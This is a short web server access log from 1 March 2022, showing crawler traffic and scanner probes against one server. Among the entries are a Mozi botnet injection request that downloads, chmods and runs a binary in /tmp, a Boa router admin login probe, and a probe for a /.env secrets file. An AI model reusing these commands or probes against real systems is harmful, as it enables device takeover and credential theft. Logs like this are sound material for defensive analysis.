15.204.129.209 - - [01/Mar/2022:04:29:35 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.80:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
49.7.20.75 - - [01/Mar/2022:04:33:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
31.210.20.234 - - [01/Mar/2022:04:36:35 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
84.51.106.97 - - [01/Mar/2022:04:37:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
201.184.49.236 - - [01/Mar/2022:04:38:07 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 324 "-" "-"
49.7.20.75 - - [01/Mar/2022:04:39:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
162.142.125.221 - - [01/Mar/2022:04:44:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.221 - - [01/Mar/2022:04:44:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.221 - - [01/Mar/2022:04:44:34 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
49.7.20.75 - - [01/Mar/2022:04:45:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
222.186.19.235 - - [01/Mar/2022:04:46:57 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [01/Mar/2022:04:46:57 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2"
130.211.54.158 - - [01/Mar/2022:04:50:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
130.211.54.158 - - [01/Mar/2022:04:50:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
49.7.20.75 - - [01/Mar/2022:04:51:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
222.186.19.235 - - [01/Mar/2022:04:52:09 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [01/Mar/2022:04:52:09 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1"
222.186.19.235 - - [01/Mar/2022:04:52:09 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.8"
182.117.120.144 - - [01/Mar/2022:04:55:10 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
109.237.103.123 - - [01/Mar/2022:04:57:10 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.20.69.98 - - [01/Mar/2022:04:57:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
49.7.20.75 - - [01/Mar/2022:04:57:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
198.20.69.98 - - [01/Mar/2022:04:57:18 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
198.20.69.98 - - [01/Mar/2022:04:57:19 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
198.20.69.98 - - [01/Mar/2022:04:57:20 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
198.20.69.98 - - [01/Mar/2022:04:57:21 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
35.233.62.116 - - [01/Mar/2022:04:57:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
